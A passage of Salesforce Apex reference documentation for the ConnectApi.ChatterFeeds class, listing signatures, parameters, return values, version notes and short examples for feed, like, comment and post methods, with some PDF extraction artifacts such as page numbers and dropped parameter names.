setTestGetFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
637
Reference
ChatterFeeds Class
API Version
30.031.0
Important: In version 32.0 and later, use getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder, Boolean).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, Boolean showInternalOnly)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
638
Reference
ChatterFeeds Class
FewerUpdatesDisplays all updates from people and records the user follows and groups the user is a member of, but
hides some system-generated updates from records.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching setTestGetFeedItemsFromFeed method, returns the feed item page passed
in with that method. You must use the test method with the same parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElementsFromFilterFeed(String, String, String).
639
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFilterFeed(String communityId,
String subjectId, String keyPrefix)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching set test method, returns the feed item page that was passed in with that method, filtered
by the key prefix: only the feed items associated with the specified type are returned. You must use the test method with the exact same
parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFilterFeed(String, String, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElementsFromFilterFeed(String, String, String, String, Integer,
ConnectApi.FeedSortOrder).
640
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFilterFeed(String communityId,
String subjectId, String keyPrefix, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
641
Reference
ChatterFeeds Class
Usage
When invoked during a test with the matching set test method, returns the feed item page that was passed in with that method, filtered
by the key prefix: only the feed items associated with the specified type are returned. You must use the test method with the exact same
parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
29.031.0
Important: In version 32.0 and later, use getFeedElementsFromFilterFeed(String, String, String, Integer, Integer,
ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFilterFeed(String communityId,
String subjectId, String keyPrefix, Integer recentCommentCount, ConnectApi.FeedDensity
density, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
642
Reference
ChatterFeeds Class
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching set test method, returns the feed item page that was passed in with that method, filtered
by the key prefix: only the feed items associated with the specified type are returned. You must use the test method with the exact same
parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFilterFeed(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
643
Reference
ChatterFeeds Class
API Version
30.031.0
Important: In version 32.0 and later, use getFeedElementsFromFilterFeedUpdatedSince(String, String, String, Integer, Integer,
ConnectApi.FeedDensity, String, Integer, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFilterFeedUpdatedSince(String
communityId, String subjectId, String keyPrefix, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
644
Reference
ChatterFeeds Class
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. To retrieve this token,
call getFeedItemsFromFilterFeed and take the value from the updatesToken property of the
ConnectApi.FeedItemPage response body.
Return Value
Type: ConnectApi.FeedItemPage
A paged collection of ConnectApi.FeedItem objects.
Usage
This method returns only feed items that have been updated since the time specified in the updatedSince argument. A feed item
is considered to be updated if it was created since the last feed request, or if sort=LastModifiedDateDesc and a comment
was added to the feed item since the last feed request. Adding likes and topics doesnt update a feed item.
To test this method, use the matching set test method. When invoked during a test with the matching set test method, returns the feed
item page that was passed in with that method, filtered by the key prefix: only the feed items associated with the specified type are
returned. You must use the test method with the exact same parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFilterFeedUpdatedSince(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, String,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
30.031.0
Important: In version 32.0 and later, use getFeedElementsUpdatedSince(String, ConnectApi.FeedType, Integer,
ConnectApi.FeedDensity, String, Integer, String).
Requires Chatter
Yes
645
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedItemPage getFeedItemsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, String updatedSince)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedItemPage response body.
Return Value
Type: ConnectApi.FeedItemPage
A paged collection of ConnectApi.FeedItem objects.
Usage
This method returns only feed items that have been updated since the time specified in the updatedSince argument. A feed item
is considered to be updated if it was created since the last feed request, or if sort=LastModifiedDateDesc and a comment
was added to the feed item since the last feed request. Adding likes and topics doesnt update a feed item.
646
Reference
ChatterFeeds Class
To test code that uses this method, use the matching set test method.
Example
This example gets the feed items in the company feed and grabs the updatesToken property from the returned object. It then
passes the value of updatesToken to the getFeedItemsUpdatedSince method to get the feed items updated since the
first call:
// Get the feed items in the company feed and return the updatesToken
String communityId = null;
// Get the feed and extract the update token
ConnectApi.FeedItemPage page = ConnectApi.ChatterFeeds.getFeedItemsFromFeed(communityId,
ConnectApi.FeedType.Company);
// page.updatesToken is opaque and has a value like '2:1384549034000'
// Get the feed items that changed since the provided updatesToken
ConnectApi.FeedItemPage feedItems= ConnectApi.ChatterFeeds.getFeedItemsUpdatedSince
(communityId, ConnectApi.FeedType.Company, 1, ConnectApi.FeedDensity.AllUpdates, null,
1, page.updatesToken);
SEE ALSO:
setTestGetFeedItemsUpdatedSince(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, String,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
30.031.0
Important: In version 32.0 and later, use getFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedDensity, String, Integer, String).
Requires Chatter
Yes
647
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedItemPage getFeedItemsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
If feedType is ConnectApi.Record, subjectId can be any record ID, including a group ID. Otherwise, it must be the
context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedItemPage response body.
648
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedItemPage
A paged collection of ConnectApi.FeedItem objects.
Usage
This method returns only feed items that have been updated since the time specified in the updatedSince argument. A feed item
is considered to be updated if it was created since the last feed request, or if sort=LastModifiedDateDesc and a comment
was added to the feed item since the last feed request. Adding likes and topics doesnt update a feed item.
To test code that uses this method, use the matching set test method.
Example
This example gets the feed items in the news feed and grabs the updatesToken property from the returned object. It then passes
the value of updatesToken to the getFeedItemsUpdatedSince method to get the feed items updated since the first call:
// Get the feed items in the news feed and return the updatesToken
String communityId = null;
String subjectId = 'me';
// Get the feed and extract the update token
ConnectApi.FeedItemPage page = ConnectApi.ChatterFeeds.getFeedItemsFromFeed(communityId,
ConnectApi.FeedType.News, subjectId);
// page.updatesToken is opaque and has a value like '2:1384549034000'
// Get the feed items that changed since the provided updatesToken
ConnectApi.FeedItemPage feedItems= ConnectApi.ChatterFeeds.getFeedItemsUpdatedSince
(communityId, ConnectApi.FeedType.News, subjectId, 1, ConnectApi.FeedDensity.AllUpdates,
null, 1, page.updatesToken);
SEE ALSO:
setTestGetFeedItemsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
30.031.0
Important: In version 32.0 and later, use getFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedDensity, String, Integer, String, Boolean).
649
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince,
Boolean showInternalOnly)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
650
Reference
ChatterFeeds Class
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedItemPage response body.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
Return Value
Type: ConnectApi.FeedItemPage
A paged collection of ConnectApi.FeedItem objects.
Usage
This method returns only feed items that have been updated since the time specified in the updatedSince argument. A feed item
is considered to be updated if it was created since the last feed request, or if sort=LastModifiedDateDesc and a comment
was added to the feed item since the last feed request. Adding likes and topics doesnt update a feed item.
If showInternalOnly is true and Communities is enabled, feed items from communities are included. Otherwise, only feed
items from the internal community are included.
To test code that uses this method, use the matching set test method.
Example
This example gets the feed items in the news feed and grabs the updatesToken property from the returned object. It then passes
the value of updatesToken to the getFeedItemsUpdatedSince method to get the feed items updated since the first call:
// Get the feed items in the news feed and return the updatesToken
String communityId = null;
String subjectId = 'me';
// Get the feed and extract the update token
ConnectApi.FeedItemPage page = ConnectApi.ChatterFeeds.getFeedItemsFromFeed(communityId,
ConnectApi.FeedType.News, subjectId);
// page.updatesToken is opaque and has a value like '2:1384549034000'
// Get the feed items that changed since the provided updatesToken
ConnectApi.FeedItemPage feedItems= ConnectApi.ChatterFeeds.getFeedItemsUpdatedSince
(communityId, ConnectApi.FeedType.News, subjectId, 1, ConnectApi.FeedDensity.AllUpdates,
null, 1, page.updatesToken, true);
SEE ALSO:
setTestGetFeedItemsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String,
Boolean, ConnectApi.FeedItemPage)
Testing ConnectApi Code
getFeedPoll(String, String)
Returns the poll associated with the feed item.
651
Reference
ChatterFeeds Class
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElementPoll(String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedPoll getFeedPoll(String communityId, String feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
Return Value
Type: ConnectApi.FeedPoll
Note: Triggers on FeedItem objects run before their attachment and capabilities information is saved, which means that
ConnectApi.FeedItem.attachment information and ConnectApi.FeedElement.capabilities information
may not be available in the trigger.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Feed getFilterFeed(String communityId, String subjectId, String
keyPrefix)
652
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix is the first three characters of a record ID, which specifies the entity type.
Return Value
Type: ConnectApi.Feed
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Feed getFilterFeed(String communityId, String subjectId, String
keyPrefix, ConnectApi.FeedType sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
sortParam
Type: ConnectApi.FeedType
653
Reference
ChatterFeeds Class
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.Feed
getFilterFeedDirectory(String, String)
Gets a feed directory object that contains a list of filter feeds available to the context user. A filter feed is the news feed filtered to include
feed items whose parent is a specific entity type.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedDirectory getFilterFeedDirectory(String communityId, String
subjectId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
Return Value
Type: ConnectApi.FeedDirectory
A directory containing a list of filter feeds.
Usage
Call this method to return a directory containing a list of ConnectApi.FeedDirectoryItem objects. Each object contains a
key prefix associated with an entity type the context user is following. A key prefix is the first three characters of a record ID, which specifies
the entity type.
654
Reference
ChatterFeeds Class
Use the key prefixes to filter the news feed so that it contains only feed items whose parent is the entity type associated with the key
prefix, for example, get all the feed items whose parent is an Account. To get the feed items, pass a key prefix to the
ConnectApi.getFeedItemsFromFilterFeed method.
The information about filter feeds never contains the key prefixes for the User (005) or Group (0F9) entity types, but all users can use
those key prefixes as filters.
The ConnectApi.FeedDirectory.favorites property is always empty when returned by a call to
getFilterFeedDirectory because you cant filter a news feed by favorites.
Example
This example calls getFilterFeedDirectory and loops through the returned FeedDirectoryItem objects to find the
key prefixes the context user can use to filter their news feed. It then copies each keyPrefix value to a list. Finally, it passes one of
the key prefixes from the list to the getFeedItemsFromFilterFeed method. The returned feed items include every feed item
from the news feed whose parent is the entity type specified by the passed key prefix.
String communityId = null;
String subjectId = 'me';
// Create a list to populate with key prefixes.
List<String> keyPrefixList = new List<String>();
// Prepopulate with User and Group record types
// which are available to all users.
keyPrefixList.add('005');
keyPrefixList.add('0F9');
System.debug(keyPrefixList);
// Get the key prefixes available to the context user.
ConnectApi.FeedDirectory myFeedDirectory =
ConnectApi.ChatterFeeds.getFilterFeedDirectory(null, 'me');
// Loop through the returned feeds list.
for (ConnectApi.FeedDirectoryItem i : myFeedDirectory.feeds) {
// Grab each key prefix and add it to the list.
keyPrefixList.add(i.keyPrefix);
}
System.debug(keyPrefixList);
// Use a key prefix from the list to filter the feed items in the news feed.
ConnectApi.FeedItemPage myFeedItemPage =
ConnectApi.ChatterFeeds.getFeedItemsFromFilterFeed(communityId, subjectId,
keyPrefixList[0]);
System.debug(myFeedItemPage);
getLike(String, String)
Returns the specified like.
655
Reference
ChatterFeeds Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLike getLike(String communityId, String likeId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
likeId
Type: String
The ID for a like.
Return Value
Type: ConnectApi.ChatterLike
getLikesForComment(String, String)
Returns the first page of likes for the specified comment. The page contains the default number of items.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLikePage getLikesForComment(String communityId, String
commentId)
656
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
Return Value
Type: ConnectApi.ChatterLikePage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLikePage getLikesForComment(String communityId, String
commentId, Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
657
Reference
ChatterFeeds Class
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterLikePage
getLikesForFeedElement(String, String)
Get the first page of likes for a feed element.
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLikePage getLikesForFeedElement(String communityId,
String feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
Description
Return Value
Type: ConnectApi.ChatterLikePage Class
If the feed element doesnt support the ChatterLikes capability, the return value is ConnectApi.NotFoundException.
API Version
32.0
658
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLikePage getLikesForFeedElement(String communityId,
String feedElementId, Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
Description
pageParam
Type: Integer
Description
pageSize
Type: Integer
Description
Return Value
Type: ConnectApi.ChatterLikePage Class
If the feed element doesnt support the ChatterLikes capability, the return value is ConnectApi.NotFoundException.
getLikesForFeedItem(String, String)
Returns the first page of likes for the specified feed item. The page contains the default number of items.
API Version
28.031.0
Important: In version 32.0 and later, use getLikesForFeedElement(String, String).
659
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLikePage getLikesForFeedItem(String communityId, String
feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
Return Value
Type: ConnectApi.ChatterLikePage
API Version
28.031.0
Important: In version 32.0 and later, use getLikesForFeedElement(String, String, Integer, Integer).
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLikePage getLikesForFeedItem(String communityId, String
feedItemId, Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
660
Reference
ChatterFeeds Class
feedItemId
Type: String
The ID for a feed item.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterLikePage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedModifiedInfo isModified(String communityId,
ConnectApi.FeedType feedType, String subjectId, String since)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Specifies the type of feed. The only supported type is News
subjectId
Type: String
The ID of the context user or the alias me.
since
Type: String
an opaque token containing information about the last modified date of the feed. Retrieve this token from
Feed.isModifiedToken or FeedItemPage.isModifiedToken.
661
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedModifiedInfo
Usage
For more information, see News Feed Is-Modified in Chatter REST API Developers Guide.
likeComment(String, String)
Adds a like to the specified comment for the context user. If the user has already liked this comment, this is a non-operation and returns
the existing like.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLike likeComment(String communityId, String commentId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
Return Value
Type: ConnectApi.ChatterLike
likeFeedElement(String, String)
Like a feed element.
API Version
32.0
Requires Chatter
Yes
662
Reference
ChatterFeeds Class
Signature
public static ConnectApi.ChatterLike likeFeedElement(String communityId, String
feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: ConnectApi.ChatterLike
If the feed element doesnt support the ChatterLikes capability, the return value is ConnectApi.NotFoundException.
SEE ALSO:
Like a Feed Element
likeFeedItem(String, String)
Adds a like to the specified feed item for the context user. If the user has already liked this feed item, this is a non-operation and returns
the existing like.
API Version
28.031.0
Important: In version 32.0 and later, use likeFeedElement(String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterLike likeFeedItem(String communityId, String feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
663
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.ChatterLike
API Version
28.031.0
Important: In version 32.0 and later, use postCommentToFeedElement(String, String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.Comment postComment(String communityId, String feedItemId,
String text)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
text
Type: String
The text of the comment. Mentions are downgraded to plain text. To include a mention that links to a user, call postComment(String,
String, ConnectApi.CommentInput, ConnectApi.BinaryInput) and pass the mention in a ConnectApi.CommentInput object.
Return Value
Type: ConnectApi.Comment
Usage
If hashtags or links are detected in text, they are included in the comment as hashtag and link segments. Mentions are not detected
in text and are not separated out of the text.
Feed items and comments can contain up to 5000 characters.
664
Reference
ChatterFeeds Class
API Version
28.031.0
Important: In version 32.0 and later, use postCommentToFeedElement(String, String, ConnectApi.CommentInput,
ConnectApi.BinaryInput).
Requires Chatter
Yes
Signature
public static ConnectApi.Comment postComment(String communityId, String feedItemId,
ConnectApi.CommentInput comment, ConnectApi.BinaryInput feedItemFileUpload)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
comment
Type: ConnectApi.CommentInput
In the CommentInput object, specify rich text, including @mentions. Optionally, in the CommentInput.attachment
property, specify an existing file or a new file
feedItemFileUpload
Type: ConnectApi.BinaryInput
If you specify a NewFileAttachmentInput object in the CommentInput.attachment property, specify the new
binary file to attach in this argument. Otherwise, do not specify a value.
Return Value
Type: ConnectApi.Comment
Usage
Feed items and comments can contain up to 5000 characters.
665
Reference
ChatterFeeds Class
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.Comment postCommentToFeedElement(String communityId, String
feedElementId, String text)
666
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
text
Type: String
Text of the comment.
Return Value
Type: ConnectApi.Comment
If the feed element doesnt support the Comments capability, the return value is ConnectApi.NotFoundException on page
1086.
SEE ALSO:
Post a Comment
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.Comment postCommentToFeedElement(String communityId, String
feedElementId, ConnectApi.CommentInput comment, ConnectApi.BinaryInput
feedElementFileUpload)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
667
Reference
ChatterFeeds Class
comment
Type: ConnectApi.CommentInput
The comment body, including text and mentions, and capabilities, such as information about an attached file.
feedElementFileUpload
Type: ConnectApi.BinaryInput
A new binary file to attach to the comment, or null. If you specify a binary file, specify the title and description of the file in the
comment parameter.
Return Value
Type: ConnectApi.Comment
If the feed element doesnt support the Comments capability, the return value is ConnectApi.NotFoundException on page
1086.
SEE ALSO:
Post a Comment with a Mention
Post a Comment with a New File
Post a Comment with an Existing File
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElement postFeedElement(String communityId, String
subjectId, ConnectApi.FeedElementType feedElementType, String text)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the parent this feed element is being posted to. This value can be the ID of a user, group, or record, or the string me to
indicate the context user.
668
Reference
ChatterFeeds Class
feedElementType
Type: ConnectApi.FeedElementType
Type: String
The text of the feed element.
Return Value
Type: ConnectApi.FeedElement
SEE ALSO:
Post a Feed Element
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElement postFeedElement(String communityId,
ConnectApi.FeedElementInput feedElement, ConnectApi.BinaryInput feedElementFileUpload)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElement
Type: ConnectApi.FeedElementInput
Specify rich text, including mentions. Optionally, specify a link, a poll, an existing file, or a new file.
feedElementFileUpload
Type: ConnectApi.BinaryInput
Specify the new binary file to attach to the post only if you also specify a NewFileAttachmentInput object in the
feedElement parameter. Otherwise, do not specify a value.
669
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElement
SEE ALSO:
Post a Feed Element with a Mention
Post a Feed Element with Existing Content
Post a Feed Element with a New File (Binary) Attachment
Share a Feed Element and Add a Comment
postFeedElementBatch(String, List<ConnectApi.BatchInput>)
Posts a batch of up to 500 feed elements for the cost of one DML statement.
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.BatchResult[] postFeedElementBatch(String communityId,
List<ConnectApi.BatchInput> feedElements)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElements
Return Value
Type: ConnectApi.BatchResult[]
The ConnectApi.BatchResult.getResult() method returns a ConnectApi.FeedElement object.
The returned objects correspond to each of the input objects and are returned in the same order as the input objects.
The method call fails only if an error occurs that affects the entire operation (such as a parsing failure). If an individual object causes an
error, the error is embedded within the ConnectApi.BatchResult list.
670
Reference
ChatterFeeds Class
Usage
Use this method to post a list of feed elements efficiently. Create a list containing up to 500 objects and insert them all for the cost of
one DML statement.
The ConnectApi.BatchInput Class class has three constructors, but the postFeedElementBatch method only supports the two
listed here. It doesnt support multiple binary inputs.
In each constructor, the input object must be an instance of ConnectApi.FeedElementInput. Pick a constructor based on
whether or not you want to pass a binary input.
